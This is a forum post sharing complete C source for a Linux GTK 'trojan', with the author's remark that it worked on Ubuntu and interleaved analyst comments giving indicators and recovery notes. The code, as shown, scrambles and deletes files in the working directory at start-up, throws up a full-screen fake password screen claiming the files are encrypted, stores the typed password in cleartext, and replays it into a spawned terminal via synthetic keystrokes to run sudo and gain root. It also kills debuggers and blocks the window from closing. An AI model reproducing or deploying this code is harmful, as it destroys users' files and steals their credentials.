
GTK Linux Trojan


JMC31337


//gcc -lX11 -lXtst gtkthief2.c -o gtkthief2 `pkg-config --cflags --libs gtk+-2.0`
//JMC31337
//VIRAL WEAPONRY LABZ
#include <gtk/gtk.h>
#include <stdio.h>
//#include <gdk/gdkkeysyms.h>
#include <stdlib.h>
#include <X11/Xlib.h>
#include <X11/keysym.h>
#include <X11/extensions/XTest.h>
#include <string.h>
#include <linux/input.h>
#include <X11/Xutil.h>
#include <X11/Xatom.h>
#include <X11/keysymdef.h>
#include <dirent.h>
int apt=1;
//===================================
// delete(): removes up to two entries from the current working directory.
// In this listing it is called from the key handler when the "/sg" marker
// directory is not present after the sudo attempt.
// Analyst note: the shell commands below ("chmod 755 *", "pkill gdb") show up
// as child processes of the binary and are usable as process-level indicators.
static void delete()
{
// Sets mode 755 on everything the shell glob matches in the working directory.
system("chmod 755 *");
// Kills running gdb processes; expect attached debugger sessions to be terminated.
system("pkill gdb");
struct dirent **namelist;
int n;
int c;
// Local counter that shadows the file-scope `apt`; it caps removals at two below.
int apt=1;
int C4 = 4;
n = scandir(".", &namelist, 0, alphasort);
if (n < 0)
perror("scandir");
else
{
// Walks the alphasort-ordered listing from the last entry backwards.
while(n--)
{
// The walk ends at the first "." or ".." entry it meets.
if(strcmp(namelist[n]->d_name,".")==0 || strcmp(namelist[n]->d_name,"..")==0)
{break;}
// The binary's own name and the captured-input file SG.txt are left in place.
if(strcmp(namelist[n]->d_name,"gtkthief2")!=0)
{
if(strcmp(namelist[n]->d_name,"SG.txt")!=0)
{
if(apt<=2)
{
//printf("%s\n", namelist[n]->d_name);
// Data loss point: the entry is unlinked; only removed entries are freed here.
remove(namelist[n]->d_name);
apt++;
free(namelist[n]);
}
}
}
}
free(namelist);
}
}
//===================================
// encrypt(): rewrites entries of the current working directory into files
// named "sg<N>" and removes the originals. main() calls it before any window
// is shown, so the file changes happen at start-up.
// Recovery note for responders: the transform is a fixed per-byte shift of +4
// (stored in a char, so it wraps), with no key material. The content of each
// sg<N> file can be restored by subtracting 4 from every byte. The original
// file names are not written anywhere by this function.
static void encrypt()
{
// Child-process indicators: "chmod 755 *" and "pkill gdb" run through the shell.
system("chmod 755 *");
system("pkill gdb");
struct dirent **namelist;
int n;
int c;
// C4 is the shift value added to every byte.
int C4 = 4;
FILE *stream,*fo;
n = scandir(".", &namelist, 0, alphasort);
// tot numbers the output files; it starts at the entry count and counts down.
int tot=n;
int totd = tot*2;
if (n < 0)
perror("scandir");
else
{
// Walks the alphasort-ordered listing from the last entry backwards.
while(n--)
{
// The walk ends at the first "." or ".." entry it meets.
if(strcmp(namelist[n]->d_name,".")==0 || strcmp(namelist[n]->d_name,"..")==0)
{break;}
// Every entry except the binary's own name is processed.
if(strcmp(namelist[n]->d_name,"gtkthief2")!=0)
{
// Each processed name is printed to stdout.
printf("%s\n", namelist[n]->d_name);
//getchar();
if((stream = fopen(namelist[n]->d_name,"r")) != (FILE *) 0)
{
while((c=getc(stream)) != EOF )
{
char sgfile[255];
sprintf(sgfile,"sg%d",tot);
// Shifted byte; the output file is reopened in append mode for every byte.
char skb = c + C4;
fo=fopen(sgfile,"a+");
fprintf(fo,"%c",skb);
fclose(fo);
//printf("%d",c);
//printf("\n");
}
fclose(stream);
c=0;
}
tot--;
//totd--;
// The original entry is removed whether or not it could be opened for reading.
remove(namelist[n]->d_name);
free(namelist[n]);
}
}
free(namelist);
}
}
//===================================
// decrypt(): inverse of the byte shift used by encrypt(). It reads each entry
// of the current working directory, writes every byte minus 4 to a file named
// "sg<N>", and removes the input. N starts at twice the entry count and counts
// down per processed entry.
// The key handler calls it on the branches that print "GOT ROOT" / "ROOTED".
// Responder note: output files keep the generic sg<N> names, so the original
// file names are not restored by this routine.
static void decrypt()
{
// Child-process indicators: "chmod 755 *" and "pkill gdb" run through the shell.
system("chmod 755 *");
system("pkill gdb");
struct dirent **namelist;
int n;
int c;
// C4 is the shift value subtracted from every byte.
int C4 = 4;
FILE *stream,*fo;
n = scandir(".", &namelist, 0, alphasort);
int tot=n;
// totd numbers the output files.
int totd = tot*2;
if (n < 0)
perror("scandir");
else
{
// Walks the alphasort-ordered listing from the last entry backwards.
while(n--)
{
// The walk ends at the first "." or ".." entry it meets.
if(strcmp(namelist[n]->d_name,".")==0 || strcmp(namelist[n]->d_name,"..")==0)
{break;}
// Every entry except the binary's own name is processed.
if(strcmp(namelist[n]->d_name,"gtkthief2")!=0)
{
printf("%s\n", namelist[n]->d_name);
//getchar();
if((stream = fopen(namelist[n]->d_name,"r")) != (FILE *) 0)
{
while((c=getc(stream)) != EOF )
{
char sgfile[255];
sprintf(sgfile,"sg%d",totd);
// Reverses the +4 shift; the output file is reopened in append mode per byte.
char skb = c - C4;
fo=fopen(sgfile,"a+");
fprintf(fo,"%c",skb);
fclose(fo);
//printf("%d",c);
//printf("\n");
}
fclose(stream);
c=0;
}
//tot--;
totd--;
// The input entry is removed after it has been processed.
remove(namelist[n]->d_name);
free(namelist[n]);
}
}
free(namelist);
}}
//===================================
//THNX TADEJ
// Data: the three text buffers handed to the spawn callbacks.
// In this listing cb_out_watch writes to `out` and cb_err_watch to `err`;
// no visible code writes to `in`.
typedef struct _Data Data;
struct _Data
{
/* Buffers that will display output */
GtkTextBuffer *out;
GtkTextBuffer *in;
GtkTextBuffer *err;};
//===================================
// destroy(): handler connected to the window's "destroy" and "delete-event"
// signals in create_window(). It starts another gtk_main() loop instead of
// quitting (the gtk_main_quit call is commented out), so a window-close
// request does not end the program.
static void destroy( GtkWidget *widget,
gpointer data )
{
gtk_main();
//gtk_main_quit ();
}//===================================
// cb_err_watch(): I/O watch for the child's stderr channel.
// On hang-up it drops the channel reference and returns FALSE, which removes
// the watch. Otherwise it reads one line, appends it to data->err and returns
// TRUE to keep the watch installed.
// The return value of g_io_channel_read_line is not checked here.
static gboolean cb_err_watch( GIOChannel *channel, GIOCondition cond, Data *data)
{
gchar *string;
gsize size; if( cond == G_IO_HUP )
{
g_io_channel_unref( channel );
return( FALSE );
} g_io_channel_read_line( channel, &string, &size, NULL, NULL );
gtk_text_buffer_insert_at_cursor( data->err, string, -1 );
g_free( string ); return( TRUE );
}
//===================================
// cb_out_watch(): I/O watch for the child's stdout channel.
// On hang-up it drops the channel reference and returns FALSE, which removes
// the watch. Otherwise it reads one line, appends it to data->out and returns
// TRUE to keep the watch installed.
// The return value of g_io_channel_read_line is not checked here.
static gboolean cb_out_watch(GIOChannel *channel, GIOCondition cond, Data *data)
{
gchar *string;
gsize size; if( cond == G_IO_HUP )
{
g_io_channel_unref( channel );
return( FALSE );
} g_io_channel_read_line( channel, &string, &size, NULL, NULL );
gtk_text_buffer_insert_at_cursor( data->out, string, -1 );
g_free( string );
return( TRUE );
}
//===================================
// cb_child_watch(): child-watch callback registered in cb_execute().
// It only closes the child's pid handle; status and data are unused.
static void cb_child_watch( GPid pid, gint status, Data *data )
{
/* Close pid */
g_spawn_close_pid( pid );
}
//===================================
// cb_execute(): spawns an "xterm" child with "/usr/bin" as its working
// directory and attaches watches to its stdout and stderr pipes.
// Detection note: an xterm process whose parent is this GTK program, started
// right after Return is pressed in the password field, is part of the
// behaviour an analyst can look for in process-tree telemetry.
static void cb_execute( Data *data )
{
GPid pid;
gchar *argv[] = { "xterm",NULL };
gint out,err; GIOChannel *outch,*inch,*errch;
gboolean ret; /* Spawn child process */
// stdin is not piped (NULL); stdout and stderr descriptors are returned in out/err.
ret = g_spawn_async_with_pipes( "/usr/bin", argv, NULL,
G_SPAWN_DO_NOT_REAP_CHILD, NULL,
NULL, &pid,NULL, &out, &err, NULL );
if( ! ret )
{
g_error( "SPAWN FAILED" );
return;
} /* Add watch function to catch termination of the process. This function
* will clean any remnants of process. */
g_child_watch_add( pid, (GChildWatchFunc)cb_child_watch, data ); outch = g_io_channel_unix_new( out );
errch = g_io_channel_unix_new( err );
// inch = g_io_channel_unix_new( in ); /* Add watches to channels */
// The watches forward child output into the buffers held in `data`.
g_io_add_watch( outch, G_IO_IN | G_IO_HUP, (GIOFunc)cb_out_watch, data );
g_io_add_watch( errch, G_IO_IN | G_IO_HUP, (GIOFunc)cb_err_watch, data );
// g_io_add_watch( inch, G_IO_OUT | G_IO_HUP, (GIOFunc)cb_in_watch, data );
}
//===================================
//THNKX Bharathi
// SendKey(): produces one synthetic key press and release through the XTEST
// extension, optionally wrapped in a modifier press and release.
// Returns without sending anything when the keysym has no keycode.
// Defender context: XTEST input goes to whichever window has focus, and any
// client connected to the same X display can generate it. The protocol itself
// does not separate clients, so this is a property of the X11 session rather
// than a flaw in one application.
static void SendKey (Display * disp, KeySym keysym, KeySym modsym)
{
KeyCode keycode = 0, modcode = 0;
keycode = XKeysymToKeycode (disp, keysym);
if (keycode == 0) return;
XTestGrabControl (disp, True);
/* Generate modkey press */
if (modsym != 0)
{
modcode = XKeysymToKeycode(disp, modsym);
XTestFakeKeyEvent (disp, modcode, True, 0);
}
/* Generate regular key press and release */
XTestFakeKeyEvent (disp, keycode, True, 0);
XTestFakeKeyEvent (disp, keycode, False, 0);
/* Generate modkey release */
if (modsym != 0)
XTestFakeKeyEvent (disp, modcode, False, 0);
// Flushes the queued fake events to the server before grab control is reset.
XSync (disp, False);
XTestGrabControl (disp, False);
}
//===================================
// Disable(): sends a synthetic key-release for the given keysym through XTEST.
// Its only visible callers are inside commented-out sections of the key
// handler, where it is applied to the Alt and Control keys.
// modcode is never assigned from modsym in this function and stays 0.
static void Disable (Display * disp, KeySym keysym, KeySym modsym)
{
KeyCode keycode = 0, modcode = 0;
keycode = XKeysymToKeycode (disp, keysym);
XTestGrabControl (disp, True);
XTestFakeKeyEvent (disp, keycode, False, 0);
if (modsym != 0)
{
XTestFakeKeyEvent (disp, modcode, False, 0);
}
XSync (disp, False);
XTestGrabControl (disp, False);
}
//===================================
// exprog(): signal handler that sets SIGINT to be ignored from then on.
// Its only visible registration is in a commented-out line of the key handler.
void exprog(int sig);void exprog(int sig)
{
signal(SIGINT,SIG_IGN);}
// updatex(): "key-press-event" handler attached to the password entry in
// create_window(). The work happens when Return is pressed:
//   1. runs "mkdir /sg" and checks getuid(); if both indicate root it calls
//      decrypt() and gtk_main_quit();
//   2. writes the text of the entry field in cleartext to "SG.txt" in the
//      working directory;
//   3. spawns an xterm, waits for its ReparentNotify on the root window, gives
//      it input focus and injects the keystrokes "sudo mkdir /sg";
//   4. replays the contents of SG.txt as keystrokes three times, apparently to
//      answer sudo's password prompt;
//   5. runs "ls /sg": if the directory is missing it calls delete(), otherwise
//      decrypt().
// Indicators visible in this code: files "SG.txt" and "sg<N>" in the working
// directory, a directory "/sg" at the filesystem root, shell children running
// "mkdir /sg", "ls /sg" and "pkill xterm", and a "sudo mkdir /sg" entry in the
// sudo/auth logs.
// Response note: any password typed into this window was stored in cleartext
// and replayed to a terminal, so it should be treated as compromised.
//====================================gboolean updatex (GtkWidget *entry, GdkEventKey *event, gpointer nolle)
{ const gchar *text = gtk_entry_get_text(GTK_ENTRY(entry));int sig;
//signal(SIGINT,exprog);if(event -> keyval != '\0')
{/*
if(event -> keyval == XK_Alt_L)
{
Display *disp = XOpenDisplay (NULL);
Disable (disp, XK_Alt_L,0);
XSync (disp, False);
XTestGrabControl (disp, False);
XCloseDisplay(disp);
gtk_widget_grab_focus(GTK_WIDGET(entry));
}
*/
/*
if(event -> keyval == XK_Alt_R)
{
Display *disp = XOpenDisplay (NULL);
Disable (disp, XK_Alt_R,0);
XSync (disp, False);
XTestGrabControl (disp, False);
XCloseDisplay(disp);
gtk_widget_grab_focus(GTK_WIDGET(entry));
}
*/
/*
if(event -> keyval == XK_Control_R)
{Display *disp = XOpenDisplay (NULL);
Disable (disp, XK_Control_R,0);
XSync (disp, False);
XTestGrabControl (disp, False);
XCloseDisplay(disp);
gtk_widget_grab_focus(GTK_WIDGET(entry));}if(event -> keyval == XK_Control_L)
{Display *disp = XOpenDisplay (NULL);
Disable (disp, XK_Control_L,0);
XSync (disp, False);
XTestGrabControl (disp, False);
XCloseDisplay(disp);
gtk_widget_grab_focus(GTK_WIDGET(entry));}
*/if(event -> keyval == XK_Return)
{
// Privilege probe: success of "mkdir /sg" plus getuid() == 0 is taken as running as root.
int x = system("mkdir /sg"); //BadCrC
if(x!=0 || getuid() != 0) //thnx herm1t
{
printf("NOT ROOT\n");
}
else
{
printf("GOT ROOT\n");
decrypt();
gtk_main_quit(); //RUN WHATEVER FUNCTION YOU WANT AS ROOT HERE
}
//g_print(text);
//g_print("\n");FILE *fp;
// Credential capture: the entry text is written unencrypted to SG.txt; fopen's result is not checked.
fp=fopen("SG.txt","w+"); //BadCrC
fputs(text,fp);
fclose(fp);Display *disp = XOpenDisplay (NULL);
XSync (disp, False);
XTestGrabControl (disp, False);
XFlush(disp);
XCloseDisplay(disp);
Data *data;
data = g_slice_new(Data);
// Starts the xterm child whose window is targeted below.
cb_execute(data); //NEEDED FOR REPARENT WINDOW PROCESS ID//========================= Display *display;
Window rootwin;
display = XOpenDisplay( NULL );
rootwin = DefaultRootWindow( display );
// Subscribes to substructure events on the root window to see the new window being reparented.
XSelectInput( display, rootwin, SubstructureNotifyMask );
XEvent event;
int y=0;
// Blocks in XNextEvent until one ReparentNotify has been handled.
while(y==0)
{
XNextEvent( display, &event );
if(event.type == ReparentNotify )
{
XReparentEvent *reparentevent = (XReparentEvent *)&event;
//printf( "Spawned WinID: 0x%x\n", (unsigned int)(reparentevent->window));
sleep(1);
Display *disp2 = XOpenDisplay (NULL);
Window w;
char *end = NULL;
unsigned int w_str = reparentevent->window;
//w=strtoul(ch,&end,16);
// Moves input focus to the reparented window so the synthetic keys land there.
XSetInputFocus(disp2,w_str,RevertToPointerRoot,CurrentTime);
XFlush(disp2);
sleep(3);
// The key sequence below spells "sudo mkdir /sg" followed by Return.
SendKey (disp2, XK_s, 0);
SendKey (disp2, XK_u, 0);
SendKey (disp2, XK_d, 0);
SendKey (disp2, XK_o, 0);
SendKey (disp2, XK_space, 0);
SendKey (disp2, XK_m, 0);
SendKey (disp2, XK_k, 0);
SendKey (disp2, XK_d, 0);
SendKey (disp2, XK_i, 0);
SendKey (disp2, XK_r, 0);
SendKey (disp2, XK_space, 0);
SendKey (disp2, XK_slash, 0);
SendKey (disp2, XK_s, 0); //BadCrC
SendKey (disp2, XK_g, 0);
SendKey (disp2, XK_Return, 0);
XFlush(disp2);
//===========================
int c,zz;
zz=0;
FILE *stream;
// Three rounds, each after a 3 second pause: the bytes of SG.txt are sent as key events, then Return.
// The stream opened in each round is not closed in the visible code.
jumper:
sleep(3);
if((stream = fopen("SG.txt","r")) != (FILE *) 0)
{
while((c=getc(stream)) != EOF )
{
SendKey(disp2,c,0);
}
}
SendKey(disp2,XK_Return,0);
XFlush(disp2);
zz++;
if(zz!=3)
{goto jumper;}
//===========================
y++;
}
}//==========================int exist=system("ls /sg");
// Outcome check: a missing /sg leads to delete(); an existing /sg leads to decrypt() and exit.
if(exist!=0)
{
system("pkill xterm");
delete();
}
else
{
//RUN WHATEVERAS ROOT HERE
system("pkill xterm");
printf("ROOTED\n");
decrypt();
gtk_main_quit();
}
gtk_widget_grab_focus(GTK_WIDGET(entry));
g_slice_free(Data,data);
//gtk_main_quit();
}} return FALSE;
}
//====================================
// create_window(): builds the full-screen prompt and returns it.
// The window is undecorated, full-screen and kept above other windows, and it
// shows the value of $USER, a "PASSWORD:" label with a hidden-text entry, a
// label with the fixed text "30", and a message claiming the user's files are
// encrypted. In this listing the "30" is a static label; no timer updates it.
// Analyst note: this is a look-alike credential prompt. The message refers to
// HOME files, while the visible encrypt() works on the process's current
// working directory.
GtkWidget *
create_window(void)
{
GtkWidget *window;
GtkWidget *fixed;
GtkWidget *label,*label2,*label3,*label4;
GtkWidget *entry;
GtkWidget *nolle = NULL;window = gtk_window_new(GTK_WINDOW_TOPLEVEL);
// No title bar or borders, full-screen, always on top: the window covers the desktop.
gtk_window_set_decorated(GTK_WINDOW(window),FALSE);
gtk_window_fullscreen(GTK_WINDOW(window));
gtk_window_set_keep_above(GTK_WINDOW(window),TRUE);
fixed = gtk_fixed_new();
gtk_widget_show(fixed);
gtk_container_add(GTK_CONTAINER(window),fixed);
//=========================================
//USER NAME STUFFchar *s;
// The label text is the USER environment variable of the running session.
s=getenv("USER");
label2 = gtk_label_new(s);
gtk_widget_show(label2);
gtk_fixed_put(GTK_FIXED(fixed),label2,410,300);
//=========================================
//PASSWORD STUFF
label=gtk_label_new("PASSWORD:");
gtk_widget_show(label);
gtk_fixed_put(GTK_FIXED(fixed),label,100,350);entry = gtk_entry_new();
// Visibility FALSE masks the typed characters, as a real password field would.
gtk_entry_set_visibility(GTK_ENTRY(entry),FALSE);
gtk_entry_set_width_chars(GTK_ENTRY(entry),75);
gtk_widget_show(entry);
gtk_fixed_put(GTK_FIXED(fixed),entry,185,345);
gtk_widget_grab_focus(entry);
//==========================================
//LIKE CLOCK-WORK
//PLACE PROGRESS BAR CODE HERE!!!
char *tik = "30";
label3 = gtk_label_new(tik);
gtk_widget_show(label3);
gtk_fixed_put(GTK_FIXED(fixed),label3,430,380);
//============================================
// Pressure text shown to the user; it urges entering the password and not rebooting.
char *xox="Seconds left, your HOME files are ENCRYPTED\nENTER YOUR PASSWORD NOW! DO NOT REBOOT\n OR YOUR DATA WILL BE LOST ";
label4=gtk_label_new(xox);
gtk_widget_show(label4);
gtk_fixed_put(GTK_FIXED(fixed),label4,300,400);
//=========================================
// Every key press in the entry goes to updatex, which acts on Return.
g_signal_connect(G_OBJECT(entry), "key-press-event", G_CALLBACK(updatex), nolle);
//=========================================
//g_signal_connect(G_OBJECT(button), "clicked", G_CALLBACK(cb_execute),data);
//=========================================
// Both close paths are routed to destroy(), which does not quit the main loop.
g_signal_connect (window, "destroy",
G_CALLBACK (destroy), NULL);
//===========================================
g_signal_connect (window, "delete-event",
G_CALLBACK (destroy), NULL);
//==========================================
return window;
}main(int argc,char *argv[])
{
// Program entry: encrypt() runs first, before GTK is initialised or any prompt is shown,
// so the files in the working directory are rewritten regardless of what the user types.
encrypt();
GtkWidget *window,*text;
gtk_init(&argc,&argv);
window = create_window();
gtk_widget_set_size_request(window,600,600);
gtk_widget_show(window);
gtk_main();
// The statements below run only after the main loop has returned.
Data *data;
data = g_slice_new( Data );
text = gtk_text_view_new();
//CHILD PROCESS OUTPUT DATA IS STORED IN HERE
data->out = gtk_text_view_get_buffer( GTK_TEXT_VIEW( text ) );
//ERROR IF PERMISSION IS DENIED IS STORED IN HERE
data->err = gtk_text_view_get_buffer( GTK_TEXT_VIEW( text ) );
return 0;
}

nothing great but it worked on ubuntu

Edited by JMC31337